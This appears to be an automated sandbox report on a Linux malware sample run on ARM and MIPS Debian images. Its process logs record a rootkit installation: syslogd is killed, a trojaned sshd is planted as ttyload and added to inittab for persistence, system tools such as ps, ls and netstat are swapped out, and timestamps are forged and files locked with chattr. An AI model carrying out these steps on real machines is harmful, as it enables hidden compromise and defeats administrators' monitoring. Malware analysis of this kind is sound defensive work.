Analysis Overview
SHA256
c7d3a16ba29abcf5261b66af753f44124fcb3a303059f7cee04334983a3b6d16
Threat Level: Shows suspicious behavior
The file 4bd599176fbaab489642f3fafb083862_JaffaCakes118 was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Enumerates running processes
Write file to user bin folder
Attempts to change immutable files
Checks CPU configuration
Reads CPU attributes
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-15 23:17
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-15 23:17
Reported
2024-07-15 23:19
Platform
debian9-armhf-20240611-en
Max time kernel
24s
Max time network
25s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/sbin/ttyload | /usr/sbin/ttyload | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/hostname | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Enumerates running processes
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/sbin/ttyload | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/26/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/41/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/274/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/148/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/587/stat | /bin/pidof | N/A |
| File opened for reading | /proc/625/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/16/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/109/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/162/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/139/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/76/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/303/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/587/status | /bin/ps | N/A |
| File opened for reading | /proc/303/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/23/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/299/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/136/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/277/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/275/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/588/stat | /bin/ps | N/A |
| File opened for reading | /proc/98/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/139/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/587/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/588/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/635/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/274/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/25/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/43/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/585/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/109/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/762/stat | /bin/pidof | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/109/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/148/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/140/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/278/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/630/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/314/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/18/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/23/status | /bin/ps | N/A |
| File opened for reading | /proc/635/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/98/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/killall | N/A |
| File opened for reading | /proc/274/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/24/stat | /bin/pidof | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/26/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/136/stat | /usr/bin/killall | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/conf/hosts.h | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init1 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init2 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.shmd5 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.procs | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.stats | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/info_tmp | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/bin/.sh/sshd_config | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Processes
/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118
[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]
/usr/bin/whoami
[whoami]
/bin/tar
[tar zxf ./bin.tgz]
/bin/tar
[tar zxf ./conf.tgz]
/bin/tar
[tar zxf ./lib.tgz]
/bin/tar
[tar zxf ./utilz.tgz]
/bin/tar
[tar zxf ./sshd.tgz]
/bin/rm
[rm -rf ./sshd.tgz]
/bin/rm
[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]
/bin/sleep
[sleep 2]
/usr/bin/killall
[killall -9 syslogd]
/bin/date
[date +%S]
/bin/sleep
[sleep 2]
/bin/hostname
[hostname -f]
/bin/grep
[grep -v ^# /etc/syslog.conf]
/bin/grep
[grep -v ^$]
/bin/grep
[grep @]
/usr/bin/cut
[cut -d @ -f 2]
/bin/uname
[uname -n]
/bin/mv
[mv lib/libproc.a /lib/]
/bin/mv
[mv lib/libproc.so.2.0.6 /lib/]
/sbin/ldconfig
[/sbin/ldconfig]
/usr/bin/md5sum
[md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /etc/sh.conf]
/bin/chown
[chown -f root:root /etc/sh.conf]
/usr/bin/chattr
[chattr +isa /etc/sh.conf]
/bin/rm
[rm -rf /tmp/bin/.sh/shdcf2]
/bin/mv
[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]
/bin/mv
[mv /tmp/conf/lidps1.so /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/conf/*]
/bin/mv
[mv /tmp/conf/* /usr/include/]
/bin/mkdir
[mkdir /lib/libsh.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/libsh.so]
/bin/mkdir
[mkdir /usr/lib/libsh]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh]
/bin/mv
[mv .sh/* /lib/libsh.so/]
/bin/mv
[mv .sh/.bashrc /usr/lib/libsh]
/bin/mv
[mv /lib/libsh.so/sshd /sbin/ttyload]
/bin/chmod
[chmod a+xr /sbin/ttyload]
/bin/chmod
[chmod o-w /sbin/ttyload]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttyload]
/usr/bin/chattr
[chattr +isa /sbin/ttyload]
/bin/pidof
[pidof ttyload]
/bin/mv
[mv /tmp/bin/ttymon /sbin/ttymon]
/bin/chmod
[chmod a+xr /sbin/ttymon]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttymon]
/usr/bin/chattr
[chattr +isa /sbin/ttymon]
/bin/pidof
[pidof ttymon]
/bin/cp
[cp /bin/bash /lib/libsh.so]
/usr/bin/chattr
[chattr -isa /etc/inittab]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v ttyload]
/bin/grep
[grep -v getty]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep getty]
/bin/cat
[cat /tmp/.init2]
/usr/bin/touch
[touch -acmr /bin/ls /usr/sbin/ttyload]
/bin/chmod
[chmod +x /usr/sbin/ttyload]
/usr/bin/chattr
[chattr +isa /usr/sbin/ttyload]
/usr/sbin/ttyload
[/usr/sbin/ttyload]
/sbin/ttyload
[/sbin/ttyload -q]
/sbin/ttymon
[/sbin/ttymon]
/usr/bin/touch
[touch -amcr /etc/inittab /tmp/.init1]
/bin/mv
[mv -f /tmp/.init1 /etc/inittab]
/bin/rm
[rm -rf /tmp/.init2]
/bin/grep
[grep ttyload /etc/inittab]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ps]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ls]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/find]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/top]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/md5sum]
/tmp/encrypt
[./encrypt -e .shmd5 /dev/srd0]
/usr/bin/touch
[touch -acmr /bin/ls /dev/srd0]
/usr/bin/chattr
[chattr a+r /dev/srd0]
/bin/chown
[chown -f root:root /dev/srd0]
/bin/rm
[rm -rf .shmd5]
/usr/bin/touch
[touch -acmr /sbin/ifconfig ifconfig]
/usr/bin/touch
[touch -acmr /bin/ps ps]
/usr/bin/touch
[touch -acmr /bin/ls ls]
/usr/bin/touch
[touch -acmr /bin/netstat netstat]
/usr/bin/touch
[touch -acmr /usr/bin/find find]
/usr/bin/touch
[touch -acmr /usr/bin/top top]
/usr/bin/touch
[touch -acmr /usr/sbin/lsof lsof]
/usr/bin/touch
[touch -acmr /sbin/syslogd syslogd]
/usr/bin/touch
[touch -acmr /usr/bin/slocate slocate]
/usr/bin/touch
[touch -acmr /usr/bin/dir dir]
/usr/bin/touch
[touch -acmr /usr/bin/md5sum md5sum]
/usr/bin/touch
[touch -acmr /usr/bin/pstree pstree]
/bin/mkdir
[mkdir /usr/lib/libsh/.backup]
/usr/bin/chattr
[chattr -isa /bin/ps]
/bin/cp
[cp /bin/ps /usr/lib/libsh/.backup]
/bin/mv
[mv -f ps /bin/ps]
/usr/bin/chattr
[chattr +isa /bin/ps]
/usr/bin/chattr
[chattr -isa /sbin/ifconfig]
/bin/cp
[cp /sbin/ifconfig /usr/lib/libsh/.backup]
/bin/mv
[mv -f ifconfig /sbin/ifconfig]
/usr/bin/chattr
[chattr +isa /sbin/ifconfig]
/usr/bin/chattr
[chattr -isa /bin/netstat]
/bin/cp
[cp /bin/netstat /usr/lib/libsh/.backup]
/bin/mv
[mv -f netstat /bin/netstat]
/usr/bin/chattr
[chattr +isa /bin/netstat]
/usr/bin/chattr
[chattr -isa /usr/bin/top]
/bin/cp
[cp /usr/bin/top /usr/lib/libsh/.backup]
/bin/mv
[mv -f top /usr/bin/top]
/usr/bin/chattr
[chattr +isa /usr/bin/top]
/usr/bin/chattr
[chattr -isa /bin/ls]
/bin/cp
[cp /bin/ls /usr/lib/libsh/.backup]
/bin/mv
[mv -f ls /bin/ls]
/usr/bin/chattr
[chattr +isa /bin/ls]
/usr/bin/chattr
[chattr -isa /usr/bin/find]
/bin/cp
[cp /usr/bin/find /usr/lib/libsh/.backup]
/bin/mv
[mv -f find /usr/bin/find]
/usr/bin/chattr
[chattr +isa /usr/bin/find]
/usr/bin/chattr
[chattr -isa /usr/bin/pstree]
/bin/cp
[cp /usr/bin/pstree /usr/lib/libsh/.backup]
/bin/mv
[mv -f pstree /usr/bin/pstree]
/usr/bin/chattr
[chattr +isa /usr/bin/pstree]
/usr/bin/chattr
[chattr -isa /usr/bin/md5sum]
/bin/cp
[cp /usr/bin/md5sum /usr/lib/libsh/.backup]
/bin/mv
[mv -f md5sum /usr/bin/md5sum]
/usr/bin/chattr
[chattr +isa /usr/bin/md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz/*]
/bin/mv
[mv /tmp/utilz /usr/lib/libsh/]
/bin/mkdir
[mkdir /usr/lib/libsh/.sniff]
/bin/mv
[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]
/bin/mv
[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]
/bin/mv
[mv /tmp/bin/shsb /usr/lib/libsh/shsb]
/bin/mv
[mv /tmp/bin/hide /usr/lib/libsh/hide]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/shsb]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/hide]
/bin/chmod
[chmod +x /usr/lib/libsh/.sniff/*]
/bin/chmod
[chmod +x /usr/lib/libsh/shsb]
/bin/chmod
[chmod +x /usr/lib/libsh/hide]
/bin/ps
[ps aux]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep named]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep smbd]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep rpc.statd]
/bin/rm
[rm -rf /tmp/.procs]
/bin/cat
[cat /tmp/.stats]
/bin/grep
[grep 443]
/bin/grep
[grep http]
/bin/rm
[rm -rf /tmp/.stats]
/bin/mkdir
[mkdir /usr/lib/libsh/.owned]
/usr/bin/chattr
[chattr +isa /usr/lib/libsh]
/usr/bin/chattr
[chattr +isa /lib/libsh.so]
/usr/bin/killall
[killall -9 -q nscd]
/usr/bin/killall
[killall -9 -q xntps]
/usr/bin/killall
[killall -9 -q mountd]
/usr/bin/killall
[killall -9 -q mserv]
/usr/bin/killall
[killall -9 -q psybnc]
/usr/bin/killall
[killall -9 -q t0rns]
/usr/bin/killall
[killall -9 -q linsniffer]
/usr/bin/killall
[killall -9 -q sniffer]
/usr/bin/killall
[killall -9 -q lpsched]
/usr/bin/killall
[killall -9 -q sniff]
/usr/bin/killall
[killall -9 -q sn1f]
/usr/bin/killall
[killall -9 -q sshd2]
/usr/bin/killall
[killall -9 -q xsf]
/usr/bin/killall
[killall -9 -q xchk]
/usr/bin/killall
[killall -9 -q ssh2d]
/sbin/ifconfig
[/sbin/ifconfig eth0]
/bin/grep
[grep inet addr:]
/usr/bin/awk
[awk -F {print $2} ]
/usr/bin/cut
[cut -c6-]
/bin/hostname
[hostname -f]
/bin/uname
[uname -a]
/usr/bin/awk
[awk { print $11 }]
/bin/cat
[cat /tmp/info_tmp]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/usr/bin/awk
[awk {print $3}]
/bin/hostname
[hostname -i]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep eth]
/usr/bin/wc
[wc -l]
/usr/bin/head
[head -1 /etc/debian_version]
/bin/rm
[rm -rf /tmp/info_tmp]
/bin/date
[date +%S]
/usr/bin/expr
[expr 33 - 13]
/sbin/iptables
[/sbin/iptables -L input]
/usr/bin/head
[head -5]
/sbin/syslogd
[/sbin/syslogd -m 0]
/bin/rm
[rm -rf ../shv5*]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-0 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-0 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-0 | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-15 23:17
Reported
2024-07-15 23:19
Platform
debian9-mipsbe-20240611-en
Max time kernel
72s
Max time network
73s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/sbin/ttyload | /usr/sbin/ttyload | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/hostname | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Enumerates running processes
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/sbin/ttyload | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/704/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/345/stat | /bin/pidof | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/6/stat | /bin/ps | N/A |
| File opened for reading | /proc/402/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/146/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/310/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/81/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/886/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/73/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/532/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/313/stat | /bin/pidof | N/A |
| File opened for reading | /proc/371/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/2/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/77/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/383/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/145/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/371/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/76/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/77/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/78/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/36/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/799/stat | /bin/pidof | N/A |
| File opened for reading | /proc/708/stat | /bin/ps | N/A |
| File opened for reading | /proc/77/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/146/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/384/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/496/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/371/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/70/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/913/stat | /bin/ps | N/A |
| File opened for reading | /proc/384/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/223/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/16/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/14/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/70/stat | /bin/ps | N/A |
| File opened for reading | /proc/483/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/23/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/483/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/11/stat | /bin/pidof | N/A |
| File opened for reading | /proc/146/stat | /bin/pidof | N/A |
| File opened for reading | /proc/312/status | /bin/ps | N/A |
| File opened for reading | /proc/345/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/stat | /bin/pidof | N/A |
| File opened for reading | /proc/75/stat | /bin/ps | N/A |
| File opened for reading | /proc/706/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/24/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/384/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/372/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/496/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/114/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/705/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/78/cmdline | /bin/pidof | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/bin/.sh/sshd_config | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/conf/hosts.h | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init1 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init2 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.shmd5 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.procs | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.stats | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/info_tmp | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Processes
/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118
[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]
/usr/bin/whoami
[whoami]
/bin/tar
[tar zxf ./bin.tgz]
/bin/tar
[tar zxf ./conf.tgz]
/bin/tar
[tar zxf ./lib.tgz]
/bin/tar
[tar zxf ./utilz.tgz]
/bin/tar
[tar zxf ./sshd.tgz]
/bin/rm
[rm -rf ./sshd.tgz]
/bin/rm
[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]
/bin/sleep
[sleep 2]
/usr/bin/killall
[killall -9 syslogd]
/bin/date
[date +%S]
/bin/sleep
[sleep 2]
/bin/hostname
[hostname -f]
/bin/grep
[grep -v ^$]
/bin/grep
[grep -v ^# /etc/syslog.conf]
/bin/grep
[grep @]
/usr/bin/cut
[cut -d @ -f 2]
/bin/uname
[uname -n]
/bin/mv
[mv lib/libproc.a /lib/]
/bin/mv
[mv lib/libproc.so.2.0.6 /lib/]
/sbin/ldconfig
[/sbin/ldconfig]
/usr/bin/md5sum
[md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /etc/sh.conf]
/bin/chown
[chown -f root:root /etc/sh.conf]
/usr/bin/chattr
[chattr +isa /etc/sh.conf]
/bin/rm
[rm -rf /tmp/bin/.sh/shdcf2]
/bin/mv
[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]
/bin/mv
[mv /tmp/conf/lidps1.so /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/conf/*]
/bin/mv
[mv /tmp/conf/* /usr/include/]
/bin/mkdir
[mkdir /lib/libsh.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/libsh.so]
/bin/mkdir
[mkdir /usr/lib/libsh]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh]
/bin/mv
[mv .sh/* /lib/libsh.so/]
/bin/mv
[mv .sh/.bashrc /usr/lib/libsh]
/bin/mv
[mv /lib/libsh.so/sshd /sbin/ttyload]
/bin/chmod
[chmod a+xr /sbin/ttyload]
/bin/chmod
[chmod o-w /sbin/ttyload]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttyload]
/usr/bin/chattr
[chattr +isa /sbin/ttyload]
/bin/pidof
[pidof ttyload]
/bin/mv
[mv /tmp/bin/ttymon /sbin/ttymon]
/bin/chmod
[chmod a+xr /sbin/ttymon]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttymon]
/usr/bin/chattr
[chattr +isa /sbin/ttymon]
/bin/pidof
[pidof ttymon]
/bin/cp
[cp /bin/bash /lib/libsh.so]
/usr/bin/chattr
[chattr -isa /etc/inittab]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v ttyload]
/bin/grep
[grep -v getty]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep getty]
/bin/cat
[cat /tmp/.init2]
/usr/bin/touch
[touch -acmr /bin/ls /usr/sbin/ttyload]
/bin/chmod
[chmod +x /usr/sbin/ttyload]
/usr/bin/chattr
[chattr +isa /usr/sbin/ttyload]
/usr/sbin/ttyload
[/usr/sbin/ttyload]
/sbin/ttyload
[/sbin/ttyload -q]
/sbin/ttymon
[/sbin/ttymon]
/usr/bin/touch
[touch -amcr /etc/inittab /tmp/.init1]
/bin/mv
[mv -f /tmp/.init1 /etc/inittab]
/bin/rm
[rm -rf /tmp/.init2]
/bin/grep
[grep ttyload /etc/inittab]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ps]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ls]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/find]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/top]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/md5sum]
/tmp/encrypt
[./encrypt -e .shmd5 /dev/srd0]
/usr/bin/touch
[touch -acmr /bin/ls /dev/srd0]
/usr/bin/chattr
[chattr a+r /dev/srd0]
/bin/chown
[chown -f root:root /dev/srd0]
/bin/rm
[rm -rf .shmd5]
/usr/bin/touch
[touch -acmr /sbin/ifconfig ifconfig]
/usr/bin/touch
[touch -acmr /bin/ps ps]
/usr/bin/touch
[touch -acmr /bin/ls ls]
/usr/bin/touch
[touch -acmr /bin/netstat netstat]
/usr/bin/touch
[touch -acmr /usr/bin/find find]
/usr/bin/touch
[touch -acmr /usr/bin/top top]
/usr/bin/touch
[touch -acmr /usr/sbin/lsof lsof]
/usr/bin/touch
[touch -acmr /sbin/syslogd syslogd]
/usr/bin/touch
[touch -acmr /usr/bin/slocate slocate]
/usr/bin/touch
[touch -acmr /usr/bin/dir dir]
/usr/bin/touch
[touch -acmr /usr/bin/md5sum md5sum]
/usr/bin/touch
[touch -acmr /usr/bin/pstree pstree]
/bin/mkdir
[mkdir /usr/lib/libsh/.backup]
/usr/bin/chattr
[chattr -isa /bin/ps]
/bin/cp
[cp /bin/ps /usr/lib/libsh/.backup]
/bin/mv
[mv -f ps /bin/ps]
/usr/bin/chattr
[chattr +isa /bin/ps]
